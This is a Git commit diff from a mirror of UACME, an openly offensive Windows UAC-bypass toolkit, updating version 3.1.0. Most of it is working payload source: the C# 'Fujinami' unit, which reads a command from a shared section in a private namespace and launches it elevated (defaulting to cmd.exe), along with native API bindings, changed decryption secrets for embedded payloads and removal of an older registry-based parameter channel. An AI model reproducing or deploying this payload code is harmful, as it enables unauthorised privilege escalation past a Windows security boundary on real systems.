Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 3.1.0 

Fujinami updated.
This commit is contained in:
hfiref0x 2018-11-14 01:23:31 +07:00
parent ec044ecb5a
commit 069b570219
25 changed files with 675 additions and 117 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Source/Akagi/bin/Akatsuki64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Chiyoda64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Fujinami.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Ikazuchi32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Ikazuchi64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Kamikaze.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/hibiki32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/hibiki64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/kongou32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/kongou64.cd
View File

Binary file not shown.

16
Source/Akagi/methods/methods.c
View File

@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
* DATE: 11 Nov 2018
* DATE: 13 Nov 2018
*
* UAC bypass dispatch.
*
@ -384,22 +384,8 @@ BOOL MethodsManagerCall(
// 2. Optional parameter from Akagi command line.
//
if (Entry->SetParameters) {
//
// Special case for dotnet unit.
// Reimplementation pending.
//
if (Entry->PayloadResourceId == FUJINAMI_ID) {
if (g_ctx.OptionalParameterLength != 0) {
supSetParameter(
(LPWSTR)&g_ctx.szOptionalParameter,
(DWORD)(g_ctx.OptionalParameterLength * sizeof(WCHAR))
);
}
}
else {
bParametersBlockSet = supCreateSharedParametersBlock();
}
}
bResult = (BOOL)Entry->Routine(&ParamsBlock);

12
Source/Akagi/secrets.h
View File

@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
* DATE: 11 Nov 2018
* DATE: 13 Nov 2018
*
* Secrets used for decryption.
*
@ -40,9 +40,9 @@ static const unsigned char g_bSecrets[288] = {
0x46, 0x30, 0xB9, 0x80, 0x26, 0x6C, 0x0E, 0x18, 0xE4, 0xF3, 0x97, 0x1B, 0x9C, 0xCE, 0x9F, 0x3F,
0x09, 0xC2, 0x85, 0x0B, 0xE0, 0x4F, 0xDA, 0x57, 0xF7, 0xF7, 0xBB, 0x8F, 0x0E, 0x53, 0xF4, 0xD8,
0xF8, 0x1A, 0x4F, 0xFF, 0x24, 0xDA, 0xFF, 0x66, 0xA2, 0x18, 0x5D, 0xBC, 0xA8, 0xBE, 0x28, 0x6D,
0x6E, 0x7F, 0x9A, 0x2E, 0x7F, 0x2D, 0x5A, 0xB5, 0x2C, 0x25, 0xEE, 0xEA, 0xC2, 0xA6, 0xBA, 0x80,
0xC2, 0x73, 0xC8, 0xB6, 0x39, 0xFD, 0x9A, 0xF1, 0x6F, 0x77, 0x24, 0x42, 0x34, 0xE2, 0xF9, 0x6B,
0xC8, 0xEA, 0x3A, 0xAC, 0x7F, 0x0C, 0x47, 0xC5, 0x01, 0xD6, 0xAD, 0x5B, 0x25, 0x28, 0x53, 0xC6,
0x6E, 0x7F, 0x9A, 0x2E, 0x7F, 0x2D, 0x5A, 0xB5, 0x45, 0x60, 0x51, 0xD6, 0x3F, 0x7B, 0x15, 0xC2,
0x77, 0x8D, 0x29, 0xDC, 0xDE, 0xE1, 0xED, 0x7B, 0x78, 0xC8, 0xEE, 0x7C, 0x49, 0x69, 0xB7, 0xAF,
0xF9, 0x05, 0x78, 0x47, 0x01, 0x63, 0x77, 0x13, 0x01, 0xD6, 0xAD, 0x5B, 0x25, 0x28, 0x53, 0xC6,
0x68, 0xE0, 0x78, 0xBA, 0xA4, 0x5B, 0x0C, 0x93, 0x10, 0xC9, 0xF7, 0xDB, 0x65, 0x03, 0x20, 0xB0,
0x24, 0x43, 0xA1, 0x1D, 0x19, 0x9B, 0x13, 0x81, 0x19, 0x3F, 0xDE, 0x19, 0x48, 0x93, 0x27, 0x4F,
0xF1, 0xC9, 0xDF, 0x0F, 0x30, 0x4C, 0xDF, 0x75, 0xAB, 0xEA, 0x72, 0x51, 0x2C, 0x56, 0x42, 0x3C,
@ -57,8 +57,8 @@ static const unsigned char g_bSecrets[180] = {
0x20, 0x06, 0x6F, 0x70, 0xD2, 0xBD, 0x76, 0x74, 0xA4, 0xDC, 0xB9, 0x73, 0x08, 0x93, 0xEE, 0x05,
0x31, 0xAF, 0xE1, 0x5F, 0x01, 0x42, 0x89, 0x10, 0xDD, 0x79, 0x8E, 0xE6, 0x2E, 0x82, 0x02, 0xDB,
0x2E, 0xB2, 0x99, 0x81, 0x1B, 0xA8, 0x15, 0xD5, 0x53, 0xFD, 0xC9, 0x92, 0x2A, 0xCC, 0x98, 0x30,
0x26, 0x31, 0xC6, 0xBA, 0x62, 0xE7, 0x38, 0x85, 0xC8, 0x67, 0xE0, 0xE6, 0x99, 0xBC, 0x19, 0xF6,
0x60, 0x69, 0x18, 0x3A, 0xC4, 0x03, 0x3A, 0xEC, 0xC7, 0xF4, 0x06, 0xD4, 0x8F, 0xED, 0x85, 0x40,
0x4F, 0x74, 0x79, 0x86, 0x9F, 0x3A, 0x97, 0xC7, 0x7D, 0x99, 0x01, 0x8C, 0x7E, 0xA0, 0x6E, 0x7C,
0x77, 0xD6, 0xD2, 0x04, 0xB9, 0x88, 0x74, 0x28, 0xF6, 0x1B, 0x44, 0x3F, 0xF1, 0x82, 0xB5, 0x96,
0x9F, 0x3D, 0x7A, 0xF4, 0x5D, 0x82, 0xDA, 0x88, 0x0C, 0x79, 0x48, 0xD3, 0x51, 0x7B, 0x39, 0x77,
0x76, 0x3A, 0xF8, 0xBD, 0xA9, 0xC5, 0x11, 0xBF, 0xC7, 0x86, 0xDD, 0xA2, 0x49, 0xE9, 0x28, 0x1C,
0xF6, 0x97, 0x26, 0x75

38
Source/Akagi/sup.c
View File

@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
* DATE: 11 Nov 2018
* DATE: 13 Nov 2018
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -1026,42 +1026,6 @@ LPWSTR supQueryEnvironmentVariableOffset(
return (ptr + Value->Length / sizeof(WCHAR));
}
/*
* supSetParameter
*
* Purpose:
*
* Set parameter for payload execution.
*
*/
BOOL supSetParameter(
_In_ LPWSTR lpParameter,
_In_ DWORD cbParameter
)
{
BOOL bResult = FALSE;
HKEY hKey = NULL;
LRESULT lRet;
lRet = RegCreateKeyEx(HKEY_CURRENT_USER, T_AKAGI_KEY, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
//
// Write optional parameter.
//
lRet = RegSetValueEx(hKey, T_AKAGI_PARAM, 0, REG_SZ,
(LPBYTE)lpParameter, cbParameter);
bResult = (lRet == ERROR_SUCCESS);
RegCloseKey(hKey);
}
return bResult;
}
/*
* supChkSum
*

6
Source/Akagi/sup.h
View File

@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
* DATE: 11 Nov 2018
* DATE: 13 Nov 2018
*
* Common header file for the program support routines.
*
@ -132,10 +132,6 @@ DWORD supQueryEntryPointRVA(
LPWSTR supQueryEnvironmentVariableOffset(
_In_ PUNICODE_STRING Value);
BOOL supSetParameter(
_In_ LPWSTR lpParameter,
_In_ DWORD cbParameter);
DWORD supCalculateCheckSumForMappedFile(
_In_ PVOID BaseAddress,
_In_ ULONG FileLength);

2
Source/Akagi/uacme.vcxproj.user
View File

@ -23,7 +23,7 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>52</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

161
Source/Fujinami/EntryPoint.cs
View File

@ -1,51 +1,170 @@
using System;
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018
*
* TITLE: FUJINAMI.CS
*
* VERSION: 3.10
*
* DATE: 13 Nov 2018
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
using System;
using System.Diagnostics;
using Microsoft.Win32;
using System.Runtime.InteropServices;
//
// Fujinami payload code
//
// Simplified version of old Fubuki version.
// Read registry value with custom parameter and execute it.
//
namespace Fujinami
{
public class EntryPoint
{
/// <summary>
/// Program entry point.
/// </summary>
static EntryPoint()
{
try
{
Debug.Write("Ready, fire!");
string CustomParam = string.Empty;
bool bSharedParamsReadOk = false;
IntPtr BoundaryDescriptor = NativeMethods.CreateBoundaryDescriptorW("ArisuTsuberuku", 0);
if (BoundaryDescriptor == IntPtr.Zero)
return;
try
IntPtr domainSid = IntPtr.Zero;
IntPtr pSid = IntPtr.Zero;
uint cbSid = 0;
NativeMethods.CreateWellKnownSid(NativeMethods.WELL_KNOWN_SID_TYPE.WinWorldSid, domainSid, pSid, ref cbSid);
pSid = Marshal.AllocHGlobal(Convert.ToInt32(cbSid));
if (!NativeMethods.CreateWellKnownSid(
NativeMethods.WELL_KNOWN_SID_TYPE.WinWorldSid,
domainSid,
pSid,
ref cbSid))
{
RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Akagi", false);
CustomParam = Key.GetValue("LoveLetter").ToString();
Key.Close();
} catch {
//
// Suppress any errors.
//
CustomParam = null;
return;
}
if (CustomParam == null)
CustomParam = "cmd.exe";
if (!NativeMethods.AddSIDToBoundaryDescriptor(ref BoundaryDescriptor, pSid))
return;
try
IntPtr hPrivateNamespace = NativeMethods.OpenPrivateNamespaceW(BoundaryDescriptor, "AkagiIsoSpace");
Marshal.FreeHGlobal(pSid);
NativeMethods.DeleteBoundaryDescriptor(BoundaryDescriptor);
if (hPrivateNamespace == IntPtr.Zero)
return;
IntPtr hSection = IntPtr.Zero;
NativeMethods.OBJECT_ATTRIBUTES oa = new NativeMethods.OBJECT_ATTRIBUTES(
"AkagiSharedSection",
NativeMethods.ObjectFlags.CaseInsensitive,
hPrivateNamespace);
NativeMethods.NtStatus Status = NativeMethods.NtOpenSection(
out hSection,
NativeMethods.SectionAccess.MapRead,
ref oa);
if (NativeMethods.IsSuccess(Status))
{
Process.Start(CustomParam);
IntPtr BaseAddress = IntPtr.Zero;
IntPtr ViewSize = new IntPtr(0x1000);
long sectionOffset = 0;
Status = NativeMethods.NtMapViewOfSection(
hSection,
NativeMethods.GetCurrentProcess(),
ref BaseAddress,
IntPtr.Zero,
new IntPtr(0x1000),
ref sectionOffset,
ref ViewSize,
NativeMethods.SectionInherit.ViewUnmap,
NativeMethods.MemoryFlags.TopDown,
NativeMethods.MemoryProtection.ReadOnly);
if (NativeMethods.IsSuccess(Status))
{
Int32 StructSize = Marshal.SizeOf(typeof(NativeMethods.SHARED_PARAMS));
byte[] rawData = new byte[StructSize];
Marshal.Copy(BaseAddress, rawData, 0, StructSize);
NativeMethods.SHARED_PARAMS SharedParams = (NativeMethods.SHARED_PARAMS)
Marshal.PtrToStructure(
Marshal.UnsafeAddrOfPinnedArrayElement(rawData, 0),
typeof(NativeMethods.SHARED_PARAMS));
NativeMethods.NtUnmapViewOfSection(hSection, BaseAddress);
var Crc32 = SharedParams.Crc32;
SharedParams.Crc32 = 0;
var StructPtr = Marshal.AllocHGlobal(StructSize);
Marshal.StructureToPtr(SharedParams, StructPtr, false);
bSharedParamsReadOk = (Crc32 == NativeMethods.RtlComputeCrc32(0, StructPtr, Convert.ToUInt32(StructSize)));
Marshal.FreeHGlobal(StructPtr);
var PayloadToExecute = string.Empty;
if (bSharedParamsReadOk)
{
PayloadToExecute = SharedParams.szParameter;
}
if (PayloadToExecute == string.Empty)
PayloadToExecute = "cmd.exe";
Process.Start(PayloadToExecute);
if (bSharedParamsReadOk)
{
IntPtr hEvent = IntPtr.Zero;
NativeMethods.OBJECT_ATTRIBUTES oae = new NativeMethods.OBJECT_ATTRIBUTES(
SharedParams.szSignalObject,
NativeMethods.ObjectFlags.CaseInsensitive,
hPrivateNamespace);
Status = NativeMethods.NtOpenEvent(out hEvent, NativeMethods.EventAccess.AllAccess, ref oae);
if (NativeMethods.IsSuccess(Status))
{
int prev = 0;
NativeMethods.NtSetEvent(hEvent, out prev);
NativeMethods.NtClose(hEvent);
}
}
}
NativeMethods.NtClose(hSection);
}
NativeMethods.ClosePrivateNamespace(hPrivateNamespace, 0);
}
catch
{
//
// Suppress any errors.
//
Environment.Exit(0);
}
Debug.Write("Bye!");
Environment.Exit(0);
}
}

12
Source/Fujinami/Fujinami.csproj
View File

@ -42,6 +42,18 @@
<ItemGroup>
<Compile Include="EntryPoint.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<Compile Include="WinNT.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
</EmbeddedResource>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.

2
Source/Fujinami/Properties/AssemblyInfo.cs
View File

@ -33,4 +33,4 @@ using System.Runtime.InteropServices;
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.1805")]
[assembly: AssemblyFileVersion("3.1.0.1811")]

63
Source/Fujinami/Properties/Resources.Designer.cs generated Normal file
View File

@ -0,0 +1,63 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace Fujinami.Properties {
using System;
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources {
private static global::System.Resources.ResourceManager resourceMan;
private static global::System.Globalization.CultureInfo resourceCulture;
[global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
internal Resources() {
}
/// <summary>
/// Returns the cached ResourceManager instance used by this class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Resources.ResourceManager ResourceManager {
get {
if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Fujinami.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp;
}
return resourceMan;
}
}
/// <summary>
/// Overrides the current thread's CurrentUICulture property for all
/// resource lookups using this strongly typed resource class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Globalization.CultureInfo Culture {
get {
return resourceCulture;
}
set {
resourceCulture = value;
}
}
}
}

101
Source/Fujinami/Properties/Resources.resx Normal file
View File

@ -0,0 +1,101 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 1.3
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">1.3</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1">this is my long string</data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
[base64 mime encoded serialized .NET Framework object]
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
[base64 mime encoded string representing a byte array form of the .NET Framework object]
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>1.3</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.3500.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.3500.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

319
Source/Fujinami/WinNT.cs Normal file
View File

@ -0,0 +1,319 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018
*
* TITLE: NATIVEMETHODS.CS
*
* VERSION: 1.0.1.0
*
* DATE: 11 Nov 2018
*
* Unmanaged API definitions and prototypes.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
using System;
using System.Runtime.InteropServices;
namespace Fujinami
{
public static class NativeMethods
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct SHARED_PARAMS
{
public UInt32 Crc32;
public UInt32 SessionId;
public UInt32 AkagiFlag;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
public string szParameter;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
public string szDesktop;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
public string szWinstation;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 261)]
public string szSignalObject;
}
public enum WELL_KNOWN_SID_TYPE
{
WinWorldSid = 1
}
public const Int32 SECURITY_MAX_SID_SIZE = 68;
public enum NtStatus : UInt32
{
Success = 0x00000000,
Informational = 0x40000000,
Warning = 0x80000000,
Error = 0xc0000000,
MaximumNtStatus = 0xffffffff
}
public static bool IsSuccess(NtStatus status) => status >= NtStatus.Success && status < NtStatus.Informational;
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr OpenPrivateNamespaceW(
[In] IntPtr lpBoundaryDescriptor,
[In] [MarshalAs(UnmanagedType.LPWStr)] string lpAliasPrefix);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool ClosePrivateNamespace(
[In] IntPtr Handle,
[In] UInt32 Flags);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr CreateBoundaryDescriptorW(
[In] [MarshalAs(UnmanagedType.LPWStr)] string Name,
[In] UInt32 Flags);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern void DeleteBoundaryDescriptor(
[In] IntPtr BoundaryDescriptor);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool CreateWellKnownSid(
[In] WELL_KNOWN_SID_TYPE WellKnownSidType,
[In] IntPtr DomainSid,
[In] IntPtr pSid,
ref UInt32 cbSid);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool AddSIDToBoundaryDescriptor(
ref IntPtr BoundaryDescriptor,
[In] IntPtr RequiredSid);
[Flags]
public enum ObjectFlags : UInt32
{
Inherit = 0x2,
Permanent = 0x10,
Exclusive = 0x20,
CaseInsensitive = 0x40,
OpenIf = 0x80,
OpenLink = 0x100,
KernelHandle = 0x200,
ForceAccessCheck = 0x400,
ValidAttributes = 0x7f2
}
[StructLayout(LayoutKind.Sequential)]
public struct UNICODE_STRING : IDisposable
{
public ushort Length;
public ushort MaximumLength;
private IntPtr buffer;
public UNICODE_STRING(string s)
{
Length = (ushort)(s.Length * 2);
MaximumLength = (ushort)(Length + 2);
buffer = Marshal.StringToHGlobalUni(s);
}
public void Dispose()
{
Marshal.FreeHGlobal(buffer);
buffer = IntPtr.Zero;
}
public override string ToString()
{
return Marshal.PtrToStringUni(buffer);
}
}
[StructLayout(LayoutKind.Sequential)]
public struct OBJECT_ATTRIBUTES : IDisposable
{
public int Length;
public IntPtr RootDirectory;
private IntPtr objectName;
public ObjectFlags Attributes;
private IntPtr SecurityDescriptor;
private IntPtr SecurityQualityOfService;
public OBJECT_ATTRIBUTES(string name, ObjectFlags attrs, IntPtr root)
{
Length = 0;
RootDirectory = root;
objectName = IntPtr.Zero;
Attributes = attrs;
SecurityDescriptor = IntPtr.Zero;
SecurityQualityOfService = IntPtr.Zero;
Length = Marshal.SizeOf(this);
ObjectName = new UNICODE_STRING(name);
}
public UNICODE_STRING ObjectName
{
get
{
return (UNICODE_STRING)Marshal.PtrToStructure(
objectName, typeof(UNICODE_STRING));
}
set
{
bool fDeleteOld = objectName != IntPtr.Zero;
if (!fDeleteOld)
objectName = Marshal.AllocHGlobal(Marshal.SizeOf(value));
Marshal.StructureToPtr(value, objectName, fDeleteOld);
}
}
public void Dispose()
{
if (objectName != IntPtr.Zero)
{
Marshal.DestroyStructure(objectName, typeof(UNICODE_STRING));
Marshal.FreeHGlobal(objectName);
objectName = IntPtr.Zero;
}
}
}
[Flags]
public enum StandardRights : UInt32
{
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
Required = 0x000f0000,
Read = ReadControl,
Write = ReadControl,
Execute = ReadControl,
All = 0x001f0000,
SpecificRightsAll = 0x0000ffff,
AccessSystemSecurity = 0x01000000,
MaximumAllowed = 0x02000000,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000
}
[Flags]
public enum SectionAccess : UInt32
{
Query = 0x0001,
MapWrite = 0x0002,
MapRead = 0x0004,
MapExecute = 0x0008,
ExtendSize = 0x0010,
MapExecuteExplicit = 0x0020,
AllAccess = StandardRights.Required | Query | MapWrite | MapRead | MapExecute | ExtendSize
}
public enum SectionInherit : Int32
{
ViewShare = 1,
ViewUnmap = 2
}
[Flags]
public enum MemoryFlags : UInt32
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Free = 0x10000,
Private = 0x20000,
Mapped = 0x40000,
Reset = 0x80000,
TopDown = 0x100000,
WriteWatch = 0x200000,
Physical = 0x400000,
LargePages = 0x20000000,
DosLimit = 0x40000000,
FourMbPages = 0x80000000
}
[Flags]
public enum MemoryProtection : UInt32
{
AccessDenied = 0x0,
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
Guard = 0x100,
NoCache = 0x200,
WriteCombine = 0x400,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08
}
[Flags]
public enum EventAccess : UInt32
{
QueryState = 0x1,
ModifyState = 0x2,
AllAccess = StandardRights.Required | StandardRights.Synchronize |
QueryState | ModifyState
}
[DllImport("ntdll.dll")]
public static extern NtStatus NtClose(
[In] IntPtr hObject);
[DllImport("ntdll.dll")]
public static extern NtStatus NtOpenSection(
[Out] out IntPtr SectionHandle,
[In] SectionAccess DesiredAccess,
[In] ref OBJECT_ATTRIBUTES ObjectAttributes);
[DllImport("ntdll.dll")]
public static extern NtStatus NtMapViewOfSection(
[In] IntPtr SectionHandle,
[In] IntPtr ProcessHandle,
ref IntPtr BaseAddress,
[In] IntPtr ZeroBits,
[In] IntPtr CommitSize,
[Optional] ref long SectionOffset,
ref IntPtr ViewSize,
[In] SectionInherit InheritDisposition,
[In] MemoryFlags AllocationType,
[In] MemoryProtection Win32Protect);
[DllImport("ntdll.dll")]
public static extern NtStatus NtUnmapViewOfSection(
[In] IntPtr ProcessHandle,
[In] IntPtr BaseAddress);
[DllImport("ntdll.dll")]
public static extern UInt32 RtlComputeCrc32(
[In] UInt32 PartialCrc,
[In] IntPtr Buffer,
[In] UInt32 Length);
[DllImport("ntdll.dll")]
public static extern NtStatus NtOpenEvent(
[Out] out IntPtr EventHandle,
[In] EventAccess DesiredAccess,
[In] ref OBJECT_ATTRIBUTES ObjectAttributes);
[DllImport("ntdll.dll")]
public static extern NtStatus NtSetEvent(
[In] IntPtr EventHandle,
[Out] [Optional] out int PreviousState);
}
}

7
Source/Shared/consts.h
View File

@ -6,7 +6,7 @@
*
* VERSION: 3.10
*
* DATE: 11 Nov 2018
* DATE: 13 Nov 2018
*
* Global consts definition file.
*
@ -224,11 +224,6 @@
#define WOW64STRING L"Wow64 detected, use x64 version of this tool."
#define WOW64WIN32ONLY L"This method only works with x86-32 Windows or from Wow64"
#define UACFIX L"This method fixed/unavailable in the current version of Windows, do you still want to continue?"
#define T_AKAGI_KEY L"Software\\Akagi"
#define T_AKAGI_PARAM L"LoveLetter"
#define T_AKAGI_FLAG L"Flag"
#define T_AKAGI_SESSION L"SessionId"
#define T_AKAGI_DESKTOP L"Desktop"
#define T_VOLATILE_ENV L"Volatile Environment"
#define T_SYSTEMROOT_VAR L"SYSTEMROOT"
#define T_REGISTRY_PREP L"\\REGISTRY\\" //end slash included

45
UACME.sha256
View File

@ -17,25 +17,25 @@ bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\m
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
41e356533943def6051a43b038c7373eddb9a8ddee8c8bceb334afe68c01fb71 *Source\Akagi\Resource.rc
cfc8f5d323e494e1e94a2d46a981b0c51637b5f9c8bf3bf5e12d2ab8e1e72cc2 *Source\Akagi\secrets.h
4fc09cca516505c14cd24c18c44d82b52a695bd212f4233040bf11b5c37c184d *Source\Akagi\sup.c
4774bf0445d79d31601b813672065ec63d858cb0c0ccb3a0eedc99cdeab54bb5 *Source\Akagi\sup.h
eb45f0d669e0aeb8a2d93b01d49edf436aaed4120bb9fd0675a0a7bb5b7a6760 *Source\Akagi\secrets.h
27dd10a306a85abf640cc69bcfb910260dc2f8817cbac41c6b1f6313aa624ecf *Source\Akagi\sup.c
d3f23308eaae8bc2b327e8289deb68ab9f93eaebf92739d7600c161674dff690 *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
